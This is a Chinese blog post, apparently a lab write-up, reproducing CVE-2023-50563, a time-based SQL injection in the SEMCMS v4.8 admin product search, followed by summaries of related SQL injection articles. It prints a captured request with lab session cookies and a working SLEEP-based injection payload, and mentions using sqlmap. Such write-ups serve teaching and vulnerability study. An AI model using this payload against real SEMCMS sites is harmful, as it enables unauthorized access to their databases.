CVE-2023-50563(sql延时注入)

最新推荐文章于 2024-07-18 10:54:23 发布
最新推荐文章于 2024-07-18 10:54:23 发布
阅读量5.1w 收藏
点赞数 4
文章标签: sql 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/139814973
版权

简介

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入

过程

打开靶场

目录扫描,发现安装install目录,进入,更改为如下图数据,才能安装

安装完成之后发现后台跳转地址和账号密码

,进入后台,找到产品管理,在搜索框搜索并抓包

抓取数据如下

POST /ulREd2_Admin/SEMCMS_Products.php?lgid=1 HTTP/1.1
Host: eci-2zeggdejvhu1jtbyx5nw.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://eci-2zeggdejvhu1jtbyx5nw.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zeggdejvhu1jtbyx5nw.cloudeci1.ichunqiu.com/ulREd2_Admin/SEMCMS_Products.php?lgid=1
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718534506,1718637671,1718723953,1718802016; ci_session=e6f8a3776d81118b214edfcbf197058440d5e51b; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1718806212; __tins__4329483=%7B%22sid%22%3A%201718806256941%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201718808056941%7D; __51cke__=; __51laig__=1; scusername=%E6%80%BB%E8%B4%A6%E5%8F%B7; scuseradmin=Admin; scuserpass=c4ca4238a0b923820dcc509a6f75849b
Upgrade-Insecure-Requests: 1
Priority: u=4

searchml=&search=456456

sqlmap直接进行注入攻击

payload

searchml=' AND (SELECT 3690 FROM (SELECT(SLEEP(5)))IOMz) AND 'bDAt'='bDAt&search=12331231

BTY@BTY
关注
SemCms外贸网站商城系统 SQL注入漏洞复现(CVE-2023-50563)
0xSec
01-04 1287
SemCms外贸网站商城系统4.8版本SEMCMS_Function.php 中的 AID 参数存在SQL注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库权限,深入利用可获取服务器权限
PrestaShop购物系统 SQL注入漏洞复现(CVE-2023-30150)
0xSec
01-20 952
PrestaShop的部分主题中使用Leo Custom Ajax模块拓展,Leo Custom Ajax模块中可以在/modules/leocustomajax/leoajax.php中使用多个 GET 参数(cat_list、pro_info、pro_add、pro_cdown、pro_color)来操作HTTP请求,使未经身份验证的远程攻击者能够执行 SQL 注入,控制数据库权限获取敏感信息。
春秋云镜 CVE-2023-50563
qq274575499的博客
04-30 487
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入
Django SQL注入漏洞(CVE-2020-7471)复现
玄道的网安博客
08-01 2833
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
春秋云境CVE-2023-50563
2303_76653367的博客
05-16 587
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入
【春秋云境】CVE-2023-50563 SEMCMS 后台SQL注入
HMX404的博客
04-17 474
SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入
Django SQL注入 (CVE-2021-35042)
qq_23003811的博客
07-18 212
order_by 是来自 Web 应用程序客户端的不受信任的输入,而 3.1.13 之前的 Django 3.1.x 和 3.2.5 之前的 3.2.x 允许 QuerySet.order_by SQL 注入。3、访问/vuln/?order=页面报错,有回显,而且flag就在这里。2、访问vuln/,返回一个数据列表,有列表首先想到的就是排序。1、输入任意不存在目录,提示存在vuln/接口。Django 3.2.5 之前的 3.2.x。
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
2301_80127209的博客
06-18 543
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
Cacti 前台SQL注入漏洞复现(CVE-2023-39361)
0xSec
01-19 1031
该漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。
WordPress plugin MStore API SQL注入漏洞复现(CVE-2023-3077)
0xSec
05-31 642
WordPress plugin MStore API 3.9.8 版本之前存在SQL注入漏洞,该漏洞源于没有正确清理或转义某些字段,导致出现SQL注入,未经身份验证的远程攻击者可获取数据库敏感信息。
春秋云境 CVE-2022-4230 夺旗
05-02
此URL中包含了延时SQL注入语句,通过观察响应时间的变化来判断SQL语句是否被执行。 ##### 4. 观察与分析 - **观察响应**:通过浏览器或Burp Suite等工具发送恶意请求,并观察响应时间。如果SQL注入语句被执行,则...
宏景eHR SQL 注入漏洞复现(CVE-2023-6655)
0xSec
12-11 1320
宏景eHR 中发现了一种被分类为关键的漏洞,该漏洞影响了Login Interface组件中/w_selfservice/oauthservlet/%2e../.%2e/general/inform/org/loadhistroyorgtree文件的某个未知功能。通过操纵参数parentid可能导致SQL注入攻击,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
Apache-Skywalking-SQL注入(CVE-2020-9483)复现
weixin_42558965的博客
10-08 1275
漏洞描述 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apac
通达OA SQL注入漏洞【CVE-2023-4165】
holyxp的博客
08-10 2901
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞1(CVE-2023-4165)文件,对参数 DELETE_STR 的操作会导致 sql 注入
网络安全SQL 注入漏洞_cve-2021-1636
qq_53058639的博客
05-21 503
WordPress是一个用PHP编写的免费开源内容管理系统,由于函数的校验不当,导致了可能通过插件或主题以某种方式从而触发SQL注入的情况。这已经在中进行了修复。影响版本可以追溯到3.7.37。
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1261
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
weixin_42786460的博客
09-01 1409
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
CVE-2022-20261 Wordpress的插件SQL注入漏洞分析及修补
鸣蜩十四的博客
03-11 7602
简介 wordpress是世界上使用最多的开源 CMS 之一。在允许开发者自己构建插件和主题来管理网站时,使用我们的许多便捷功能,wordpress的核心会提供插件/主题调用和使用wordpress函数的功能,如数据格式、查询数据库等许多选项在提供的众多类中,WP提供的查询DB的类中有SQL Injection错误:WP_Query。WP_Query 是 WordPress 提供的一个用于处理复杂 SQL 查询的类,在 WordPress 核心框架和插件中使用范围非常广泛,用户可以通过 WP_Query 类
CVE-2023-4206、CVE-2023-4207 和 CVE-2023-4208)
最新发布
08-15
这三个CVE编号(CVE-2023-4206、CVE-2023-4207 和 CVE-2023-4208)都是信息安全领域中对潜在漏洞的标识。每个CVE代表一个独立的已知安全威胁,可能会影响不同的软件产品、服务或协议。这些漏洞可能是关于: - **权限提升(Code Execution)**:允许恶意代码运行,攻击者能控制受影响系统的部分或全部操作。 - **数据泄露(Data Exposure)**:可能导致敏感信息暴露给未经授权的第三方。 - **网络攻击(Network Vulnerability)**:影响网络安全架构,可能被用于发起DoS攻击或信息窃取。 修复这类漏洞通常包括立即安装安全更新、关闭不必要的服务端口、升级到无漏洞版本,以及强化访问控制和防火墙规则。具体修复步骤取决于漏洞描述和受影响环境的特点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值